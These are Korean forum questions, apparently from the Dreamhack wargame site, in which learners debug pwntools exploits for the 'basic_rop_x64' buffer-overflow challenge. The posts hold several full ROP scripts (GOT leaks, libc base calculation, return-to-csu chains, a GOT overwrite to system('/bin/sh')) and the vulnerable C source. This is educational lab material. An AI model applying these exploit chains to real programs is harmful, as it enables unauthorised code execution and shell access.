basic_rop_x64

from pwn import * def slog(name, addr): return success(": ".join([name, hex(addr)])) context.log_level = 'debug' p = process("./basic_rop_x64") e = ELF("./basic_rop_x64") libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so") puts_plt = e.plt['puts'] puts_got = e.got['puts'] read_plt = e.plt['read'] read_got = e.got['read'] write_got = e.got['write'] pop_rdi = 0x0000000000400883 bss = e.bss() rtc1 = 0x0000000000400876 rtc2 = 0x0000000000400860 payload = b'a'0x40 + b'b'0x8 puts(puts_got) payload += p64(pop_rdi) + p64(puts_got) payload += p64(puts_plt) read(0, .bss, 0x10) payload += p64(rtc1) payload += b'a'*0x8 payload += p64(0) #rbx payload += p64(1) #rbp payload += p64(read_got) #r12 payload += p64(0) #r13 -> edi payload += p64(bss) #r14 -> rsi payload += p64(0x10) #r15 -> rdx payload += p64(rtc2) read(0, puts_got, 0x10) payload += b'a'*0x8 payload += p64(0) payload += p64(1) payload += p64(read_got) payload += p64(0) payload += p64(puts_got) payload += p64(0x10) payload += p64(rtc2) puts('/bin/sh') == system('/bin/sh') payload += b'a'*0x8 payload += p64(0) payload += p64(1) payload += p64(puts_got) payload += p64(bss) payload += p64(0) payload += p64(0) payload += p64(rtc2) pause() p.send(payload) p.recvuntil("a"*0x40) puts = u64(p.recvn(6) + b'\x00'*2) lb = puts - libc.symbols["puts"] system = lb + libc.symbols["system"] slog("puts", puts) slog("lb", lb) slog("system", system) p.send(b'/bin/sh\00') p.send(p64(system)) p.interactive() libc의 베이스 주소를 구한 후 return to csu 방법으로 bss영역에 'bin/sh\x00'을 입력하고 puts의 got를 system의 주소로 덮어서 puts를 실행하여 system을 실행하고자 위의 코드를 짰습니다. (이건 제출용은 아니고 일단 로컬에서만 돌려보려고 문제파일 복붙해서 새로 컴파일했습니다.) 그런데 계속 오류가 나서 gdb attach해서 디버깅을 했는데 puts_got를 출력해서 이를 읽어오는 것과 bss에 '/bin/sh\x00'을 입력하는 것까지는 제대로 동작하는걸 확인했으나, puts의 got에 system의 주소를 덮어쓰는 부분에서 뭔가 문제가 생겼습니다. ollk@DESKTOP-NQP2DLJ_ ~ 2022-04-24 오전 12_05_41.png 위 사진에 나온 부분이 read를 실행하여 puts의 got에 system의 주소를 덮어쓰는 부분입니다. 이 부분 이후에 0x601018에 system의 주소가 있어야하는데 ollk@DESKTOP-NQP2DLJ_ ~ 2022-04-24 오전 12_10_12.png 위 사진처럼 popen이라는 이상한 친구가 들어있는겁니다. system주소로 덮는 과정에서 저 값이 바뀌는 이유를 모르겠습니다.

분명 exploit을 제대로 짰다 생각해서 로컬에서 계속 돌렸는데 EOF만 나고 다른 반응이 없었습니다. 혹시나 해서 서버에서 실행을 해보았는데 바로 성공했습니다. 혹시 이유가 무엇인지 궁금합니다. (libc라고 생각하긴 하는데 정확하게는 잘 모르겠습니다..)

1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <signal.h> 4 #include <unistd.h> 5 6 7 void alarm_handler() { 8 puts("TIME OUT"); 9 exit(-1); 10 } 11 12 13 void initialize() { 14 setvbuf(stdin, NULL, _IONBF, 0); 15 setvbuf(stdout, NULL, _IONBF, 0); 16 17 signal(SIGALRM, alarm_handler); 18 alarm(30); 19 } 20 21 int main(int argc, char *argv[]) { 22 char buf[0x40] = {}; 23 24 initialize(); 25 26 read(0, buf, 0x400); 27 write(1, buf, sizeof(buf)); 28 29 return 0; 30 } 위의 코드가 취약한 코드입니다. 제가 접근한 방식은 rop함께하기 문제처럼 read에서 bof를 발생시켜 write함수를 통해 read의 got을 읽고 그 읽어온 값을 바탕으로 system함수의 주소를 구한다. read함수를 호출시켜 read함수로 read의 got을 system함수의 주소로 변경하고 read의 got + 8 주소에 /bin/sh\x00을 입력한다. read함수를 호출시켜 쉘을 획득한다. 일런 공격 시나리오로 공격을 하려고 하는데요 이런 접근 방식이 맞는건지 확인 부탁드립니다.

어느부분이 문제인건가요?ㅜㅜㅜ from pwn import * p = remote("host3.dreamhack.games",21490) def slog(name, addr): return success(": ".join([name, hex(addr)])) context.log_level = 'debug' e = ELF("./basic_rop_x64") libc = ELF("libc.so.6") puts_plt=e.plt['puts'] read_plt=e.plt['read'] read_got=e.got['read'] pop_rdi=0x0000000000400883 pop_rsi_pop_r15=0x0000000000400881 payload = b"A"0x40 + b"B"0x8 puts(read_got) payload += p64(pop_rdi) + p64(read_got) payload += p64(puts_plt) read(0, read_got, 0x10) payload += p64(pop_rdi) + p64(0) payload += p64(pop_rsi_pop_r15) + p64(read_got) + p64(0) payload += p64(read_plt) read("/bin/sh") == system("/bin/sh") payload += p64(pop_rdi) payload += p64(read_got+0x8) payload += p64(read_plt) p.send(payload) read = u64(p.recvn(6)+b"\x00"*2) lb = read - libc.symbols["read"] system = lb + libc.symbols["system"] slog("read", read) slog("libc base", lb) slog("system", system) p.send(p64(system)+b"/bin/sh\x00") p.interactive() 그리고 어덯해 익스플로잇 코드를 디버깅 하나요? 어느부분이 문제인지 익스코드 디버킹 하는지 알려주세요

이문제로 많이 해메고 잇어요 거의 다온거같은데 system 함수가 전달 안되는 거같아요 어떤게 문제죠? ㅜ 작성한 셀코드는 from pwn import* context.log_level = "debug" p = process("./basic_rop_x64") #p =remote("host3.dreamhack.games",20854) #e = ELF("./basic_rop_x64") libc = ELF("./libc.so.6") read_got = 0x601030 bss = 0x601080 write_got = 0x601020 csu_init1 = 0x40087a csu_init2 = 0x400860 payload = b"A" * 0x48 #write(1,write,8) leack got payload +=p64(csu_init1) payload +=p64(0) payload +=p64(1) payload +=p64(write_got) payload +=p64(8) payload +=p64(write_got) payload +=p64(1) payload +=p64(csu_init2) #read(0,bss,binsh) payload +=p64(0) payload +=p64(1) payload +=p64(read_got) payload +=p64(8) payload +=p64(bss) payload +=p64(0) payload +=p64(csu_init2) #write(1,read_got,sytem) payload +=p64(0) payload +=p64(1) payload +=p64(write_got) payload +=p64(8) payload +=p64(read_got) payload +=p64(1) payload +=p64(csu_init2) #system(binsh) payload +=p64(0) payload +=p64(1) payload +=p64(read_got) payload +=p64(0) payload +=p64(0) payload +=p64(bss) payload +=p64(csu_init2) p.sendline(payload) print(p.recvn(0x40)) write_addr = u64(p.recvn(8)) libc_base = write_addr - 0xf72b0 system = libc_base - 0xf72b0 + 0x45390 print('write @ ' + hex(write_addr)) print('system @ ' + hex(system)) p.send('/bin/sh\x00') p.sendline(p64(system)) gdb.attach(p) pause() p.interactive() 이렇캐 됩니당 ㅜㅜ 버전은 20.4

read(0, buf, 0x400); write(1, buf, sizeof(buf)); read_got와 puts_plt를 통해 read의 got를 출력해서 leak 시키는 페이로드를 만들고 버퍼오버플로우를 통해 ret에 저장시키면 출력하면서 가져올 수 있는데요 read의 got값 출력보다 write의 출력이 먼저 수행되는 이유가 궁금합니다

from pwn import * context.log_level = 'debug' #p = remote("host3.dreamhack.games", 21826) p = process("./basic_rop_x64") e = ELF("./basic_rop_x64") libc = ELF("./libc.so.6") read_plt = e.plt['read'] read_got = e.got['read'] puts_plt = e.plt['puts'] pop_rdi = 0x0000000000000a73 print(f"read_plt: {hex(read_plt)}") print(f"read_got: {hex(read_got)}") print(f"puts_plt: {hex(puts_plt)}") payload = b'A'0x40 + b'B'0x8 payload += p64(pop_rdi) payload += p64(read_got) payload += p64(puts_plt) p.send(payload) p.recvuntil("A"*0x40) read = u64(p.recvn(6) + b"\x00"*2) 질문 왜 buf(0x40) + sfp(0x8)가 아닌 buf(0x40)을 넘겨야 read 함수 주소인가요?

rop 워게임 복습중 코드는 이렇습니다 from pwn import* p = remote("host3.dreamhack.games",23073) e = ELF("./basic_rop_x64") libc = ELF("./libc.so.6") read_plt = 0x4005f0 write_plt = 0x4005d0 read_got = 0x601030 write_got = 0x601020 csu_init1 = 0x40087a csu_init2 = 0x400860 payload = b'A' * 0x48 payload +=p64(csu_init1) payload +=p64(0) payload +=p64(1) payload +=p64(1) payload +=p64(write_got) payload +=p64(0) payload +=p64(write_plt) payload +=p64(csu_init2) payload +=p64(0) payload +=p64(1) payload +=p64(0) payload +=p64(write_got) payload +=p64(8) payload +=p64(read_got) payload +=p64(csu_init2) payload +=p64(0) payload +=p64(1) payload +=p64(0) payload +=p64(read_got) payload +=p64(8) payload +=p64(write_got) payload +=p64(csu_init2) payload +=p64(0) payload +=p64(1) payload +=p64(1) payload +=p64(read_got) payload +=p64(write_got) payload +=p64(csu_init2) p.send(payload) write =p64(p.recv(6)+b"\x00"*2) print(hex(write)) lb = write - libc.symbols["write"] system = lb + 0x138810 p.send(p64(system)+b"/bin/sh") p.interactive() 이중 55번 write =p64(p.recv(6)+b"\x00"*2) 부분이 에로가 나는데요 저번에도 잇었지만 이번엔 확실하게 집고 넘어가고자 합니다 왜 p.send 다음부분 write 주소를 릭 하는게 에러가 날까요? 구체적으로 설명해주세용 ㅜㅜ

앞 문제에서 질문한 글 : https://dreamhack.io/forum/qna/2549 위의 링크에서 첫 번째 질문에 대한 답에 대해 이번 문제가 이해가 되질 않습니다. 첫 번째 입력(read)을 write_plt로 read()주소를 구한 후 lib_base와 system()주소를 구하는 과정에서 에러가 발생했습니다. <에러가 나오는 익스플로잇 코드> 1 #!/usr/bin/python3 2 3 from pwn import * 4 5 #p = remote("host3.dreamhack.games", 9688) 6 p = process("./basic_rop_x64") 7 e = ELF("./basic_rop_x64") 8 lib = ELF("./libc.so.6") 9 10 context.log_level = "debug" 11 12 write_plt = e.plt["write"] 13 read_plt = e.plt["read"] 14 read_got = e.got["read"] 15 pop_rdi = 0x400883 16 pop_rsi_r15 = 0x400881 17 18 payload = b"A"0x40 + b"B"0x8 19 payload += p64(pop_rdi) + p64(1) 20 payload += p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(write_plt) 21 22 p.send(payload) 23 #p.recvuntil(b"A"*0x40) 24 read = u64(p.recvn(6) + b"\x00" * 2) 25 lib_base = read - lib.symbols["read"] 26 system = lib_base + lib.symbols["system"] 27 28 print(hex(read)) 29 print(hex(lib_base)) 30 print(hex(system)) <결과(실패)> context.log_level="debug"를 이용해서 보시는 것처럼 p.recvuntil(b"A"*0x40)을 해줘야 정상적으로 read()주소를 구할 수 있다고 알게 되었습니다. p.send(payload)뒤에 p.recvuntil("A"*0x40)을 넣어주고 다시 익스플로잇 해본 결과. <결과(성공)> 잘 되는 것을 확인했습니다. 정리하자면 제일 위에 올린 링크에서 질문에 대한 답변을 보고나서 페이로드를 보내고 별 다른 출력 함수들(예를 들어 printf())이 없으면 p.recvuntil 등으로 페이로드 만큼의 데이터를 안빼는 것이라고 이해했었는데 잘못 이해한건가요?? 문제마다 달라서 항상 디버그로 확인을 해야하나요??

rop 강좌를 참고하여 똑같이 익스코드를 만들엇는데 오류가 떠요 from pwn import * def slog(name, addr): return success(": ".join([name, hex(addr)])) p = remote("host3.dreamhack.games", 20176) e = ELF("./basic_rop_x64") libc = ELF("./libc.so.6") read_plt=e.plt["read"] read_got=e.got["read"] puts_plt=e.plt["puts"] pop_rdi=0x0000000000400883 pop_rsi_r15=0x0000000000400881 payload=b"A"*0x48 payload+=p64(pop_rdi)+p64(read_got) payload+=p64(puts_plt) payload += p64(pop_rdi) + p64(0) payload += p64(pop_rsi_r15) + p64(read_got) + p64(0) payload += p64(read_plt) payload += p64(pop_rdi) payload += p64(read_got+0x8) payload += p64(read_plt) p.send(payload) read = u64(p.recvn(6)+b"\x00"*2) lb = read - libc.symbols["read"] system = lb + libc.symbols["system"] slog("read", read) slog("libc_base", lb) slog("system", system) p.send(p64(system)+b"/bin/sh\x00") p.interactive() 1어떤점이 문제가 있는걸까요? 2 rop 강좌에서 (이 실습에서는 read 함수의 GOT를 읽은 뒤 rdx 값이 매우 크게 설정되므로, rdx를 설정하는 가젯을 추가하지 않아도 됩니다. 좀 더 안정적인(reliable) 익스플로잇을 작성하려면 가젯을 추가해줘도 좋습니다.)<<<라는내용은 어떤상황에서는 rdx를 구해야된다는 것인데 ropgadet으로도 rdx가 나오지 않는대 이를 해결할수있는 방법은 무엇을까요??ㅜㅜ